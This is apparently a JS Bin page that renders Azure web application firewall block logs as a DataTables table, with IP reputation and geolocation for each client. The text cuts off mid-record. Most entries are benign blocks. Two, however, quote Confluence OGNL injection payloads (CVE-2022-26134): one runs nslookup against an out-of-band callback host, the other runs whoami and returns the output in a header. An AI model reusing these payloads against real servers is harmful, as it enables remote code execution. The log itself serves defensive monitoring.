File
Login or Register via GitHub
<html> <head><meta name="description" content="Select filter test" /> <script src="https://code.jquery.com/jquery-1.11.3.min.js"></script> <link href="https://nightly.datatables.net/css/jquery.dataTables.css" rel="stylesheet" type="text/css" /> <script src="https://nightly.datatables.net/js/jquery.dataTables.js"></script> <meta charset=utf-8 /> <title>DataTables - JS Bin</title> </head> <body> <div class="container"> <table id="azure-waf-block-table" class="display" width="100%"> </table> </div> </body></html>var data = [ [ "2022-10-18T16:28:00.5976688Z", "ExampleWafPolicy", "RG_NEW", "ad8e955d-247e-40d8-ae15-d97d805626e6", "Microsoft_DefaultRuleSet-1.1-SQLI-942330", "Microsoft_DefaultRuleSet-1.1", "SQLI", "942330", "Detects classic SQL injection probings 1/3", "https://example.com:443/rest/api/2/jql/autocompletedata/suggestions?predicateName=FROM&predicateValue=%22&fieldName=status&_=1666110219644", "2001:8a0:7254:2c00:b00f:9221:3a5e:9677", { "id": "138", "created_date": "2022-10-20 11:36:46", "last_updated": "2022-10-20 14:36:46", "ipAddress": "2001:8a0:7254:2c00:b00f:9221:3a5e:9677", "Malicious Score": "0", "is_crawler": "0", "mobile": "0", "hosting": "0", "proxy": "0", "vpn": "0", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "0", "bot_status": "0", "isPublic": "1", "ipVersion": "6", "continent": "Europe", "continentCode": "EU", "country": "Portugal", "countryCode": "PT", "region": "15", "regionName": "District of Setúbal", "city": "Amora", "district": "", "zip": "2845-545", "lat": "38.6306", "lon": "-9.111", "timezone": "Europe/Lisbon", "offset": "3600", "currency": "EUR", "isp": "MEO - SERVICOS DE COMUNICACOES E MULTIMEDIA S.A", "org": "PT Comunicacoes", "asname": "MEO-RESIDENCIAL", "ASN": "3243", "reverse": "", "domain": "telepac.pt", "usageType": "Fixed Line ISP", "reports": "0" }, "[\r\n {\r\n "matchVariableName": "QueryParamValue:predicateValue",\r\n "matchVariableValue": "\\""\r\n }\r\n]", "QueryParamValue:predicateValue", """, "QueryParamValue", "Equals", null, "predicateValue", "predicateValue", "0ENROYwAAAACp5oTsoTjDQ5n+/rvTEzyxTFRTRURHRTEzMDgAMzVmOWI5NDYtOWUxYS00OTA1LWFlZTUtY2NmMTg0YTI5NmQ3" ], [ "2022-10-18T16:24:48.6596467Z", "ExampleWafPolicy", "RG_NEW", "ad8e955d-247e-40d8-ae15-d97d805626e6", "Microsoft_DefaultRuleSet-1.1-SQLI-942330", "Microsoft_DefaultRuleSet-1.1", "SQLI", "942330", "Detects classic SQL injection probings 1/3", "https://example.com:443/rest/api/2/jql/autocompletedata/suggestions?predicateName=TO&predicateValue=%22&fieldName=status&_=1666110219633", "2001:8a0:7254:2c00:b00f:9221:3a5e:9677", { "id": "138", "created_date": "2022-10-20 11:36:46", "last_updated": "2022-10-20 14:36:46", "ipAddress": "2001:8a0:7254:2c00:b00f:9221:3a5e:9677", "Malicious Score": "0", "is_crawler": "0", "mobile": "0", "hosting": "0", "proxy": "0", "vpn": "0", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "0", "bot_status": "0", "isPublic": "1", "ipVersion": "6", "continent": "Europe", "continentCode": "EU", "country": "Portugal", "countryCode": "PT", "region": "15", "regionName": "District of Setúbal", "city": "Amora", "district": "", "zip": "2845-545", "lat": "38.6306", "lon": "-9.111", "timezone": "Europe/Lisbon", "offset": "3600", "currency": "EUR", "isp": "MEO - SERVICOS DE COMUNICACOES E MULTIMEDIA S.A", "org": "PT Comunicacoes", "asname": "MEO-RESIDENCIAL", "ASN": "3243", "reverse": "", "domain": "telepac.pt", "usageType": "Fixed Line ISP", "reports": "0" }, "[\r\n {\r\n "matchVariableName": "QueryParamValue:predicateValue",\r\n "matchVariableValue": "\\""\r\n }\r\n]", "QueryParamValue:predicateValue", """, "QueryParamValue", "Equals", null, "predicateValue", "predicateValue", "0UNNOYwAAAAC2KjZp7vBDT4nYmb0R/eOhTFRTRURHRTEzMDgAMzVmOWI5NDYtOWUxYS00OTA1LWFlZTUtY2NmMTg0YTI5NmQ3" ], [ "2022-10-18T16:25:40.8291236Z", "ExampleWafPolicy", "RG_NEW", "ad8e955d-247e-40d8-ae15-d97d805626e6", "Microsoft_DefaultRuleSet-1.1-SQLI-942330", "Microsoft_DefaultRuleSet-1.1", "SQLI", "942330", "Detects classic SQL injection probings 1/3", "https://example.com:443/rest/api/2/jql/autocompletedata/suggestions?predicateName=FROM&predicateValue=%22&fieldName=status&_=1666110219640", "2001:8a0:7254:2c00:b00f:9221:3a5e:9677", { "id": "138", "created_date": "2022-10-20 11:36:46", "last_updated": "2022-10-20 14:36:46", "ipAddress": "2001:8a0:7254:2c00:b00f:9221:3a5e:9677", "Malicious Score": "0", "is_crawler": "0", "mobile": "0", "hosting": "0", "proxy": "0", "vpn": "0", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "0", "bot_status": "0", "isPublic": "1", "ipVersion": "6", "continent": "Europe", "continentCode": "EU", "country": "Portugal", "countryCode": "PT", "region": "15", "regionName": "District of Setúbal", "city": "Amora", "district": "", "zip": "2845-545", "lat": "38.6306", "lon": "-9.111", "timezone": "Europe/Lisbon", "offset": "3600", "currency": "EUR", "isp": "MEO - SERVICOS DE COMUNICACOES E MULTIMEDIA S.A", "org": "PT Comunicacoes", "asname": "MEO-RESIDENCIAL", "ASN": "3243", "reverse": "", "domain": "telepac.pt", "usageType": "Fixed Line ISP", "reports": "0" }, "[\r\n {\r\n "matchVariableName": "QueryParamValue:predicateValue",\r\n "matchVariableValue": "\\""\r\n }\r\n]", "QueryParamValue:predicateValue", """, "QueryParamValue", "Equals", null, "predicateValue", "predicateValue", "0hNNOYwAAAAAjRbl/IboyQpGiUQYTIEjeTFRTRURHRTEzMDgAMzVmOWI5NDYtOWUxYS00OTA1LWFlZTUtY2NmMTg0YTI5NmQ3" ], [ "2022-10-17T13:16:21.3691789Z", "ExampleWafPolicy", "RG_NEW", "ad8e955d-247e-40d8-ae15-d97d805626e6", "Microsoft_DefaultRuleSet-1.1-SQLI-942350", "Microsoft_DefaultRuleSet-1.1", "SQLI", "942350", "Detects MySQL UDF injection and other data/structure manipulation attempts", "https://example.com:443/secure/RapidBoard.jspa?rapidView=292&amp;view=detail&amp;selectedIssue=MKT-147&amp;quickFilter=940", "52.114.75.216", { "id": "10", "created_date": "2022-08-18 11:16:37", "last_updated": "2022-09-30 16:58:26", "ipAddress": "52.114.75.216", "Malicious Score": "45", "is_crawler": "0", "mobile": "0", "hosting": "1", "proxy": "1", "vpn": "1", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "1", "bot_status": "1", "isPublic": "1", "ipVersion": "4", "continent": "Europe", "continentCode": "EU", "country": "Netherlands", "countryCode": "NL", "region": "NH", "regionName": "North Holland", "city": "Amsterdam", "district": "", "zip": "1047", "lat": "52.3667", "lon": "4.9", "timezone": "Europe/Amsterdam", "offset": "7200", "currency": "EUR", "isp": "Microsoft Corporation", "org": "Microsoft Azure Cloud (westeurope)", "asname": "MICROSOFT-CORP-MSN-AS-BLOCK", "ASN": "8075", "reverse": "", "domain": "microsoft.com", "usageType": "Data Center/Web Hosting/Transit", "reports": "0" }, "[\r\n {\r\n "matchVariableName": "QueryParamName",\r\n "matchVariableValue": "amp;selectedIssue"\r\n }\r\n]", "QueryParamName", "amp;selectedIssue", "QueryParamName", "Equals", null, "predicateValue", "predicateValue", "0pVVNYwAAAAAdw6PPacH4SpaFxq3EBVL+UEFSMjAxMDMxMDE0MDI1ADM1ZjliOTQ2LTllMWEtNDkwNS1hZWU1LWNjZjE4NGEyOTZkNw==" ], [ "2022-10-19T15:00:05.3320972Z", "ExampleWafPolicyApi", "RG_OLD", "ad8e955d-247e-40d8-ae15-d97d805626e6", "Microsoft_DefaultRuleSet-1.1-MS-ThreatIntel-SQLI-99031002", "Microsoft_DefaultRuleSet-1.1", "MS-ThreatIntel-SQLI", "99031002", "SQL Comment Sequence Detected.", "https://api.example.com:443/pages/docreatepage.action", "94.60.196.168", { "id": "145", "created_date": "2022-10-20 11:37:13", "last_updated": "2022-10-20 14:37:13", "ipAddress": "94.60.196.168", "Malicious Score": "0", "is_crawler": "0", "mobile": "0", "hosting": "0", "proxy": "0", "vpn": "0", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "0", "bot_status": "0", "isPublic": "1", "ipVersion": "4", "continent": "Europe", "continentCode": "EU", "country": "Portugal", "countryCode": "PT", "region": "13", "regionName": "Porto", "city": "Porto", "district": "", "zip": "4000-000", "lat": "41.1691", "lon": "-8.6793", "timezone": "Europe/Lisbon", "offset": "3600", "currency": "EUR", "isp": "Vodafone Portugal", "org": "Vodafone Telecel, Comunicacoes Pessoais, SA", "asname": "VODAFONE-PT", "ASN": "12353", "reverse": "168.196.60.94.rev.vodafone.pt", "domain": "vodafone.pt", "usageType": "", "reports": "0" }, "[\r\n {\r\n "matchVariableName": "PostParamValue:parentPageString",\r\n "matchVariableValue": "UWCL Finals - 21/22 -- 20/12/2021"\r\n }\r\n]", "PostParamValue:parentPageString", "UWCL Finals - 21/22 -- 20/12/2021", "PostParamValue", "Equals", null, "parentPageString", "parentPageString", "09RBQYwAAAACoPBvUpx4SS541IptMRYbtQlJVMzBFREdFMDQxMABlZGYxYjQ0Ny04YWJmLTQ5OWYtYjhjYy0xNmE5NzM3NmIwYTM=" ], [ "2022-10-19T13:17:29.734758Z", "ExampleWafPolicyApi", "RG_OLD", "ad8e955d-247e-40d8-ae15-d97d805626e6", "Microsoft_DefaultRuleSet-1.1-PROTOCOL-ATTACK-921151", "Microsoft_DefaultRuleSet-1.1", "PROTOCOL-ATTACK", "921151", "HTTP Header Injection Attack via payload (CR/LF detected)", "https://api.example.com:443/rest/api/search?cql=user+~+%22Has+the+Budget+been+estimated+for+the+project%5C%3F%0A%0A%0A%0AHas+the+budget+been+approved+for+project%5C%3F%0A%0A%0A%0A%0AWhat+is+the+one+time+and+recurring+costs%5C%3F%0A%0A%0A%0A%0AHave+Resources+been+estimated+%2F+secured%5C%3F%22&start=0&limit=100&_=1666184780361", "46.140.144.11", { "id": "25", "created_date": "2022-08-18 14:43:51", "last_updated": "2022-10-21 12:35:21", "ipAddress": "46.140.144.11", "Malicious Score": "0", "is_crawler": "0", "mobile": "0", "hosting": "0", "proxy": "1", "vpn": "0", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "1", "bot_status": "1", "isPublic": "1", "ipVersion": "4", "continent": "Europe", "continentCode": "EU", "country": "Switzerland", "countryCode": "CH", "region": "ZH", "regionName": "Zurich", "city": "Opfikon", "district": "", "zip": "8152", "lat": "47.4217", "lon": "8.55569", "timezone": "Europe/Zurich", "offset": "7200", "currency": "CHF", "isp": "UPC Schweiz GmbH", "org": "Sunrise UPC GmbH", "asname": "LibertyGlobal", "ASN": "6830", "reverse": "46-140-144-11.static.cablecom.ch", "domain": "hispeed.ch", "usageType": "", "reports": "0" }, "[\r\n {\r\n "matchVariableName": "QueryParamValue:cql",\r\n "matchVariableValue": "user ~ \\"Has the Budget been estimated for the project\\\\?\\n\\n\\n\\nHas the budget been approved for project\\\\?\\n\\n\\n\\n\\nWhat is the one time and recurring costs\\\\?\\n\\n\\n\\n\\nHave Resources been estimated / secured\\\\?\\""\r\n }\r\n]", "QueryParamValue:cql", "user ~ "Has the Budget been estimated for the project\\?\n\n\n\nHas the budget been approved for project\\?\n\n\n\n\nWhat is the one time and recurring costs\\?\n\n\n\n\nHave Resources been estimated / secured\\?"", "QueryParamValue", "Equals", null, "cql", "cql", "06fhPYwAAAADf9xmFU2iCSb9Qxiyks2JbWlJIRURHRTA2MTcAZWRmMWI0NDctOGFiZi00OTlmLWI4Y2MtMTZhOTczNzZiMGEz" ], [ "2022-10-19T13:17:30.2529096Z", "ExampleWafPolicyApi", "RG_OLD", "ad8e955d-247e-40d8-ae15-d97d805626e6", "Microsoft_DefaultRuleSet-1.1-PROTOCOL-ATTACK-921151", "Microsoft_DefaultRuleSet-1.1", "PROTOCOL-ATTACK", "921151", "HTTP Header Injection Attack via payload (CR/LF detected)", "https://api.example.com:443/rest/api/search?cql=user+~+%22Has+the+Budget+been+estimated+for+the+project%5C%3F%0A%0A%0A%0AHas+the+budget+been+approved+for+project%5C%3F%0A%0A%0A%0A%0AWhat+is+the+one+time+and+recurring+costs%5C%3F%0A%0A%0A%0A%0AHave+Resources+been+estimated+%2F+secured%5C%3Fk%22&start=0&limit=100&_=1666184780362", "46.140.144.11", { "id": "25", "created_date": "2022-08-18 14:43:51", "last_updated": "2022-10-21 12:35:21", "ipAddress": "46.140.144.11", "Malicious Score": "0", "is_crawler": "0", "mobile": "0", "hosting": "0", "proxy": "1", "vpn": "0", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "1", "bot_status": "1", "isPublic": "1", "ipVersion": "4", "continent": "Europe", "continentCode": "EU", "country": "Switzerland", "countryCode": "CH", "region": "ZH", "regionName": "Zurich", "city": "Opfikon", "district": "", "zip": "8152", "lat": "47.4217", "lon": "8.55569", "timezone": "Europe/Zurich", "offset": "7200", "currency": "CHF", "isp": "UPC Schweiz GmbH", "org": "Sunrise UPC GmbH", "asname": "LibertyGlobal", "ASN": "6830", "reverse": "46-140-144-11.static.cablecom.ch", "domain": "hispeed.ch", "usageType": "", "reports": "0" }, "[\r\n {\r\n "matchVariableName": "QueryParamValue:cql",\r\n "matchVariableValue": "user ~ \\"Has the Budget been estimated for the project\\\\?\\n\\n\\n\\nHas the budget been approved for project\\\\?\\n\\n\\n\\n\\nWhat is the one time and recurring costs\\\\?\\n\\n\\n\\n\\nHave Resources been estimated / secured\\\\?k\\""\r\n }\r\n]", "QueryParamValue:cql", "user ~ "Has the Budget been estimated for the project\\?\n\n\n\nHas the budget been approved for project\\?\n\n\n\n\nWhat is the one time and recurring costs\\?\n\n\n\n\nHave Resources been estimated / secured\\?k"", "QueryParamValue", "Equals", null, "cql", "cql", "06vhPYwAAAADPsK4zzms8S4Aph7io0JqkWlJIRURHRTA2MTcAZWRmMWI0NDctOGFiZi00OTlmLWI4Y2MtMTZhOTczNzZiMGEz" ], [ "2022-10-14T13:59:21.6189951Z", "ExampleWafPolicyApi", "RG_OLD", "ad8e955d-247e-40d8-ae15-d97d805626e6", "DenyList", null, null, null, "", "https://api.example.com:443/", "1.209.47.241", { "id": "6", "created_date": "2022-08-18 11:16:28", "last_updated": "2022-10-20 11:04:15", "ipAddress": "1.209.47.241", "Malicious Score": "21", "is_crawler": "0", "mobile": "0", "hosting": "0", "proxy": "1", "vpn": "0", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "0", "bot_status": "0", "isPublic": "1", "ipVersion": "4", "continent": "Asia", "continentCode": "AS", "country": "South Korea", "countryCode": "KR", "region": "41", "regionName": "Gyeonggi-do", "city": "Anyang-si", "district": "Deokcheon-ro", "zip": "14088", "lat": "37.3884", "lon": "126.936", "timezone": "Asia/Seoul", "offset": "32400", "currency": "KRW", "isp": "LG DACOM Corporation", "org": "LG Uplus", "asname": "LGDACOM", "ASN": "3786", "reverse": "", "domain": "uplus.co.kr", "usageType": "", "reports": "7" }, "[\r\n {\r\n "matchVariableName": "ClientIP",\r\n "matchVariableValue": "1.209.47.241"\r\n }\r\n]", "ClientIP", "1.209.47.241", null, "Equals", null, "Already blocked by IP", null, "0OWtJYwAAAABePH3TR7EXTYBbFT92CzFOU0VMMjFFREdFMDIwOABlZGYxYjQ0Ny04YWJmLTQ5OWYtYjhjYy0xNmE5NzM3NmIwYTM=" ], [ "2022-10-14T13:59:21.60786Z", "ExampleWafPolicyApi", "RG_OLD", "ad8e955d-247e-40d8-ae15-d97d805626e6", "DenyList", null, null, null, "", "https://api.example.com:443/", "1.209.47.241", { "id": "6", "created_date": "2022-08-18 11:16:28", "last_updated": "2022-10-20 11:04:15", "ipAddress": "1.209.47.241", "Malicious Score": "21", "is_crawler": "0", "mobile": "0", "hosting": "0", "proxy": "1", "vpn": "0", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "0", "bot_status": "0", "isPublic": "1", "ipVersion": "4", "continent": "Asia", "continentCode": "AS", "country": "South Korea", "countryCode": "KR", "region": "41", "regionName": "Gyeonggi-do", "city": "Anyang-si", "district": "Deokcheon-ro", "zip": "14088", "lat": "37.3884", "lon": "126.936", "timezone": "Asia/Seoul", "offset": "32400", "currency": "KRW", "isp": "LG DACOM Corporation", "org": "LG Uplus", "asname": "LGDACOM", "ASN": "3786", "reverse": "", "domain": "uplus.co.kr", "usageType": "", "reports": "7" }, "[\r\n {\r\n "matchVariableName": "ClientIP",\r\n "matchVariableValue": "1.209.47.241"\r\n }\r\n]", "ClientIP", "1.209.47.241", null, "Equals", null, "Already blocked by IP", null, "0OWtJYwAAAABs0zbbTE0ZTo6drCSdhZG2U0VMMjFFREdFMDIxMQBlZGYxYjQ0Ny04YWJmLTQ5OWYtYjhjYy0xNmE5NzM3NmIwYTM=" ], [ "2022-10-14T14:00:04.2776607Z", "ExampleWafPolicyApi", "RG_OLD", "ad8e955d-247e-40d8-ae15-d97d805626e6", "DenyList", null, null, null, "", "https://api.example.com:443/", "1.209.47.241", { "id": "6", "created_date": "2022-08-18 11:16:28", "last_updated": "2022-10-20 11:04:15", "ipAddress": "1.209.47.241", "Malicious Score": "21", "is_crawler": "0", "mobile": "0", "hosting": "0", "proxy": "1", "vpn": "0", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "0", "bot_status": "0", "isPublic": "1", "ipVersion": "4", "continent": "Asia", "continentCode": "AS", "country": "South Korea", "countryCode": "KR", "region": "41", "regionName": "Gyeonggi-do", "city": "Anyang-si", "district": "Deokcheon-ro", "zip": "14088", "lat": "37.3884", "lon": "126.936", "timezone": "Asia/Seoul", "offset": "32400", "currency": "KRW", "isp": "LG DACOM Corporation", "org": "LG Uplus", "asname": "LGDACOM", "ASN": "3786", "reverse": "", "domain": "uplus.co.kr", "usageType": "", "reports": "7" }, "[\r\n {\r\n "matchVariableName": "ClientIP",\r\n "matchVariableValue": "1.209.47.241"\r\n }\r\n]", "ClientIP", "1.209.47.241", null, "Equals", null, "Already blocked by IP", null, "0ZGtJYwAAAAAmeiJy5utDQKkghIWyxxthU0VMMjFFREdFMDIwNgBlZGYxYjQ0Ny04YWJmLTQ5OWYtYjhjYy0xNmE5NzM3NmIwYTM=" ], [ "2022-10-15T13:12:54.3205549Z", "ExampleWafPolicyApi", "RG_OLD", "ad8e955d-247e-40d8-ae15-d97d805626e6", "Microsoft_DefaultRuleSet-1.1-RCE-932130", "Microsoft_DefaultRuleSet-1.1", "RCE", "932130", "Remote Command tryution: Unix Shell Expression or Confluence Vulnerability (CVE-2022-26134) Found", "https://api.example.com:443/", "104.251.238.50", { "id": "139", "created_date": "2022-10-20 11:36:49", "last_updated": "2022-10-20 14:36:49", "ipAddress": "104.251.238.50", "Malicious Score": "23", "is_crawler": "0", "mobile": "0", "hosting": "1", "proxy": "1", "vpn": "1", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "0", "bot_status": "0", "isPublic": "1", "ipVersion": "4", "continent": "North America", "continentCode": "NA", "country": "United States", "countryCode": "US", "region": "CA", "regionName": "California", "city": "Los Angeles", "district": "", "zip": "90009", "lat": "34.0522", "lon": "-118.244", "timezone": "America/Los_Angeles", "offset": "-25200", "currency": "USD", "isp": "Zenlayer Inc", "org": "Klayer LLC", "asname": "ZEN-ECN", "ASN": "21859", "reverse": "104.251.238.50.static.klayer.com", "domain": "klayer.com", "usageType": "Data Center/Web Hosting/Transit", "reports": "0" }, "[\r\n {\r\n "matchVariableName": "DecodedPath",\r\n "matchVariableValue": "${@java.lang.Runtime@getRuntime().try(\\"nslookup cd596q505o11a119sf80dj1wxxs43mbbn.oast.me\\")}/"\r\n }\r\n]", "DecodedPath", "${@java.lang.Runtime@getRuntime().try("nslookup cd596q505o11a119sf80dj1wxxs43mbbn.oast.me")}/", "DecodedPath", "Equals", "java.lang.Runtime", "Very likely malicious", null, "01rFKYwAAAADqUAxzKjYtQojWLsyE+yp9TEFYMzExMDAwMTA4MDQ3AGVkZjFiNDQ3LThhYmYtNDk5Zi1iOGNjLTE2YTk3Mzc2YjBhMw==" ], [ "2022-10-15T13:12:54.2857897Z", "ExampleWafPolicyApi", "RG_OLD", "ad8e955d-247e-40d8-ae15-d97d805626e6", "Microsoft_DefaultRuleSet-1.1-RCE-932130", "Microsoft_DefaultRuleSet-1.1", "RCE", "932130", "Remote Command tryution: Unix Shell Expression or Confluence Vulnerability (CVE-2022-26134) Found", "https://api.example.com:443/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().try("whoami").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/", "104.251.238.50", { "id": "139", "created_date": "2022-10-20 11:36:49", "last_updated": "2022-10-20 14:36:49", "ipAddress": "104.251.238.50", "Malicious Score": "23", "is_crawler": "0", "mobile": "0", "hosting": "1", "proxy": "1", "vpn": "1", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "0", "bot_status": "0", "isPublic": "1", "ipVersion": "4", "continent": "North America", "continentCode": "NA", "country": "United States", "countryCode": "US", "region": "CA", "regionName": "California", "city": "Los Angeles", "district": "", "zip": "90009", "lat": "34.0522", "lon": "-118.244", "timezone": "America/Los_Angeles", "offset": "-25200", "currency": "USD", "isp": "Zenlayer Inc", "org": "Klayer LLC", "asname": "ZEN-ECN", "ASN": "21859", "reverse": "104.251.238.50.static.klayer.com", "domain": "klayer.com", "usageType": "Data Center/Web Hosting/Transit", "reports": "0" }, "[\r\n {\r\n "matchVariableName": "DecodedPath",\r\n "matchVariableValue": "${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().try(\\"whoami\\").getInputStream(),\\"utf-8\\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\\"X-Cmd-Response\\",#a))}/"\r\n }\r\n]", "DecodedPath", "${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().try("whoami").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/", "DecodedPath", "Equals", "java.lang.Runtime", "Very likely malicious", null, "01rFKYwAAAAAyThJuCwwQS6b3tJi2uoPMTEFYMzExMDAwMTA4MDIzAGVkZjFiNDQ3LThhYmYtNDk5Zi1iOGNjLTE2YTk3Mzc2YjBhMw==" ], [ "2022-10-14T14:36:00.1574471Z", "ExampleWafPolicyApi", "RG_OLD", "ad8e955d-247e-40d8-ae15-d97d805626e6", "DenyList", null, null, null, "", "https://api.example.com:443/pages/createpage-entervariables.action?SpaceKey=x", "1.209.47.241", { "id": "6", "created_date": "2022-08-18 11:16:28", "last_updated": "2022-10-20 11:04:15", "ipAddress": "1.209.47.241", "Malicious Score": "21", "is_crawler": "0", "mobile": "0", "hosting": "0", "proxy": "1", "vpn": "0", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "0", "bot_status": "0", "isPublic": "1", "ipVersion": "4", "continent": "Asia", "continentCode": "AS", "country": "South Korea", "countryCode": "KR", "region": "41", "regionName": "Gyeonggi-do", "city": "Anyang-si", "district": "Deokcheon-ro", "zip": "14088", "lat": "37.3884", "lon": "126.936", "timezone": "Asia/Seoul", "offset": "32400", "currency": "KRW", "isp": "LG DACOM Corporation", "org": "LG Uplus", "asname": "LGDACOM", "ASN": "3786", "reverse": "", "domain": "uplus.co.kr", "usageType": "", "reports": "7" }, "[\r\n {\r\n "matchVariableName": "ClientIP",\r\n "matchVariableValue": "1.209.47.241"\r\n }\r\n]", "ClientIP", "1.209.47.241", null, "Equals", null, "Already blocked by IP", null, "00HNJYwAAAAC4I8s8BM+WQJT5PY88psw2U0VMMjFFREdFMDExNQBlZGYxYjQ0Ny04YWJmLTQ5OWYtYjhjYy0xNmE5NzM3NmIwYTM=" ], [ "2022-10-14T14:36:00.1527312Z", "ExampleWafPolicyApi", "RG_OLD", "ad8e955d-247e-40d8-ae15-d97d805626e6", "DenyList", null, null, null, "", "https://api.example.com:443/pages/createpage-entervariables.action?SpaceKey=x", "1.209.47.241", { "id": "6", "created_date": "2022-08-18 11:16:28", "last_updated": "2022-10-20 11:04:15", "ipAddress": "1.209.47.241", "Malicious Score": "21", "is_crawler": "0", "mobile": "0", "hosting": "0", "proxy": "1", "vpn": "0", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "0", "bot_status": "0", "isPublic": "1", "ipVersion": "4", "continent": "Asia", "continentCode": "AS", "country": "South Korea", "countryCode": "KR", "region": "41", "regionName": "Gyeonggi-do", "city": "Anyang-si", "district": "Deokcheon-ro", "zip": "14088", "lat": "37.3884", "lon": "126.936", "timezone": "Asia/Seoul", "offset": "32400", "currency": "KRW", "isp": "LG DACOM Corporation", "org": "LG Uplus", "asname": "LGDACOM", "ASN": "3786", "reverse": "", "domain": "uplus.co.kr", "usageType": "", "reports": "7" }, "[\r\n {\r\n "matchVariableName": "ClientIP",\r\n "matchVariableValue": "1.209.47.241"\r\n }\r\n]", "ClientIP", "1.209.47.241", null, "Equals", null, "Already blocked by IP", null, "00HNJYwAAAABzhQVKlYE7Q4SM9bt5uFhHU0VMMjFFREdFMDExMQBlZGYxYjQ0Ny04YWJmLTQ5OWYtYjhjYy0xNmE5NzM3NmIwYTM=" ], [ "2022-10-18T16:24:48.6596467Z", "ExampleWafPolicy", "RG_NEW", "ad8e955d-247e-40d8-ae15-d97d805626e6", "Microsoft_DefaultRuleSet-1.1-SQLI-942330", "Microsoft_DefaultRuleSet-1.1", "SQLI", "942330", "Detects classic SQL injection probings 1/3", "https://example.com:443/rest/api/2/jql/autocompletedata/suggestions?predicateName=TO&predicateValue=%22&fieldName=status&_=1666110219633", "2001:8a0:7254:2c00:b00f:9221:3a5e:9677", { "id": "138", "created_date": "2022-10-20 11:36:46", "last_updated": "2022-10-20 14:36:46", "ipAddress": "2001:8a0:7254:2c00:b00f:9221:3a5e:9677", "Malicious Score": "0", "is_crawler": "0", "mobile": "0", "hosting": "0", "proxy": "0", "vpn": "0", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "0", "bot_status": "0", "isPublic": "1", "ipVersion": "6", "continent": "Europe", "continentCode": "EU", "country": "Portugal", "countryCode": "PT", "region": "15", "regionName": "District of Setúbal", "city": "Amora", "district": "", "zip": "2845-545", "lat": "38.6306", "lon": "-9.111", "timezone": "Europe/Lisbon", "offset": "3600", "currency": "EUR", "isp": "MEO - SERVICOS DE COMUNICACOES E MULTIMEDIA S.A", "org": "PT Comunicacoes", "asname": "MEO-RESIDENCIAL", "ASN": "3243", "reverse": "", "domain": "telepac.pt", "usageType": "Fixed Line ISP", "reports": "0" }, "[\r\n {\r\n "matchVariableName": "QueryParamValue:predicateValue",\r\n "matchVariableValue": "\\""\r\n }\r\n]", "QueryParamValue:predicateValue", """, "QueryParamValue", "Equals", null, "predicateValue", "predicateValue", "0UNNOYwAAAAC2KjZp7vBDT4nYmb0R/eOhTFRTRURHRTEzMDgAMzVmOWI5NDYtOWUxYS00OTA1LWFlZTUtY2NmMTg0YTI5NmQ3" ], [ "2022-10-18T16:25:40.8291236Z", "ExampleWafPolicy", "RG_NEW", "ad8e955d-247e-40d8-ae15-d97d805626e6", "Microsoft_DefaultRuleSet-1.1-SQLI-942330", "Microsoft_DefaultRuleSet-1.1", "SQLI", "942330", "Detects classic SQL injection probings 1/3", "https://example.com:443/rest/api/2/jql/autocompletedata/suggestions?predicateName=FROM&predicateValue=%22&fieldName=status&_=1666110219640", "2001:8a0:7254:2c00:b00f:9221:3a5e:9677", { "id": "138", "created_date": "2022-10-20 11:36:46", "last_updated": "2022-10-20 14:36:46", "ipAddress": "2001:8a0:7254:2c00:b00f:9221:3a5e:9677", "Malicious Score": "0", "is_crawler": "0", "mobile": "0", "hosting": "0", "proxy": "0", "vpn": "0", "tor": "0", "active_vpn": "0", "active_tor": "0", "recent_abuse": "0", "bot_status": "0", "isPublic": "1", "ipVersion": "6", "continent": "Europe", "continentCode": "EU", "country": "Portugal", "countryCode": "PT", "region": "15", "regionName": "District of Setúbal", "city": "Amora", "district": "", "zip": "2845-545", "lat": "38.6306", "lon": "-9.111", "timezone": "Europe/Lisbon", "offset": "3600", "currency": "EUR", "isp": "MEO - SERVICOS DE COMUNICACOES E MULTIMEDIA S.A", "org": "PT Comunicacoes", "asname": "MEO-RESIDENCIAL", "ASN": "3243", "reverse": "", "domain": "telepac.pt", "usageType": "Fixed Line ISP", "reports": "0" }, "[\r\n {\r\n "matchVariableName": "QueryParamValue:predicateValue",\r\n "matchVariableValue": "\\""\r\n }\r\n]", "QueryParamValue:predicateValue", """, "QueryParamValue", "Equals", null, "predicateValue", "predicateValue", "0hNNOYwAAAAAjRbl/IboyQpGiUQYTIEjeTFRTRURHRTEzMDgAMzVmOWI5NDYtOWUxYS00OTA1LWFlZTUtY2NmMTg0YTI5NmQ3" ], [ "2022-10-17T13:16:21.3691789Z", "ExampleWafPolicy", "RG_NEW", "ad8e955d-247e-40d8-ae15-d97d805626e6", "Microsoft_DefaultRuleSet-1.1-SQLI-942350", "Microsoft_DefaultRuleSet-1.1", "SQLI", "942350", "Detects MySQL UDF injection and other data/structure manipulation attempts", "https://example.com:443/secure/RapidBoard.jspa?rapidView=292&amp;view=detail&amp;selectedIssue=MKT-147&amp;quickFilter=940", "52.114.75.216", { "id": "10", "created_date": "2022-08-18 11:16:37", "last_updated": "2022-09-30 16:58:26", "ipAddress": "52.114.75.216", "Malicious Score": "45", "is_crawler": "0", "mobile": "0", "hosting": "1", "proxy": "1", "vpn": 